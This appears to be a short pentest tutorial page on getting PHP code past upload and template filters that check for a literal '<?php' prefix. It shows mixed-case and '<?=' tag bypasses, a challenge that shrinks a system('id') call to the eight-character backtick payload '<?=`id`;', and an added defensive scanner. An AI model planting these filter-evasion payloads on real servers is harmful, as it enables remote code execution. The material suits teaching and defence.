# Simple bypass PHP

PHP code is commonly written starting with `<?` and ending with `?>`.

Example:

```
<?php phpinfo();?>
```

When you attempt to upload a file or modify a template, the application often checks whether the content starts with the `<?php` tag.

So what are the ways to bypass it?

## Method 1

Mix upper and lower case in the opening tag.

```
<?pHp system('id');?>
```

## Method 2

Replace the `<?php` opening tag with `<?=`.

E.g.

```
<?= system('id');?>
```
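Seen from the defender's side, both methods work because the filter only looks for a literal `<?php` prefix. The following added example (not part of the original page; the function names are hypothetical) contrasts that prefix check with a scan for any opening tag anywhere in the content, run over the payloads shown on this page plus one constructed benign line:

```php
<?php
// Added example: function names are hypothetical, not from the original page.

// The prefix filter the page describes: literal, case-sensitive, start only.
function naive_starts_with_php(string $content): bool
{
    return strncmp($content, '<?php', 5) === 0;
}

// Returns every PHP opening tag found anywhere in $content as
// [byte offset, kind]. Matching is case-insensitive because PHP accepts the
// long tag in any case. It also reports the echo tag and the bare short tag;
// the bare form (including an XML declaration) opens PHP mode whenever
// short_open_tag is enabled, so it is reported and left to the caller.
function find_php_open_tags(string $content): array
{
    $found = [];
    preg_match_all('/<\?(?:php(?=\s|$)|=)?/i', $content, $m, PREG_OFFSET_CAPTURE);
    foreach ($m[0] as [$text, $offset]) {
        if (strlen($text) === 2) {
            $kind = 'short';   // bare short tag
        } elseif ($text === '<?=') {
            $kind = 'echo';    // short echo tag
        } else {
            $kind = 'long';    // long tag, any letter case
        }
        $found[] = [$offset, $kind];
    }
    return $found;
}

// Payloads taken from this page, plus one constructed benign line.
$samples = [
    "<?php phpinfo();?>",
    "<?pHp system('id');?>",
    "<?= system('id');?>",
    '<?=`id`;',
    'plain text, no tags',
];

foreach ($samples as $s) {
    $kinds = array_column(find_php_open_tags($s), 1);
    printf("%-24s naive=%-5s scan=%s\n", $s,
        var_export(naive_starts_with_php($s), true),
        $kinds ? implode(',', $kinds) : 'none');
}
```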

## PHP Reduction Challenge: Use 8 characters to run the `id` command

Original command

```
<?php system('id');?>  // 21 characters
```

### First reduction: PHP tags can be left unclosed

PHP has a feature where PHP tags are allowed to be unclosed. This means that you can use `<?php` without using `?>`, and it won't affect the execution of the PHP code.

Utilizing this feature, we can reduce the previous code as follows.

```
<?php system('id'); // 19 characters
```

### Second reduction: PHP short tags

In addition to the standard way of writing PHP tags, there are two other forms, also known as short tags.

```
<?= ?>
```

Utilizing this feature, we can reduce the previous code as follows.

```
<?= system('id'); // 17 characters
```

### Third reduction: Changing the method of executing the command

Since our goal is to successfully execute the command, is there a method that can shorten the code for executing the command? For example, is there a function that is shorter than `system`?

PHP is a large language and, of course, has functions shorter than `system` that can also execute commands.

```
eval()
popen()
exec()
....
```

These are still not short enough. The shortest of all is the backticks `` ` ` ``. PHP can execute commands using backticks.

```
system('id')  =>  `id`
```

Utilizing this feature, we can reduce the previous code as follows.

```
<?=`id`;
```

<figure><img src="https://4157702631-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FslGw3ZF0EFGfkPZZ1EMu%2Fuploads%2FuFiUgax0gxmpq9MrrR3Q%2Fimage.png?alt=media&#x26;token=5e3db974-fa15-42d5-a08d-a69116325710" alt=""><figcaption></figcaption></figure>

## Interview Question

It is interesting to see how backticks can execute shell commands. Do backticks bind to the `system` function or the `shell_exec` function?

Will disabling these 2 functions prevent backticks from executing? If not, how do you prevent it?

## Author

[Ikonw](https://github.com/Ik0nw/)

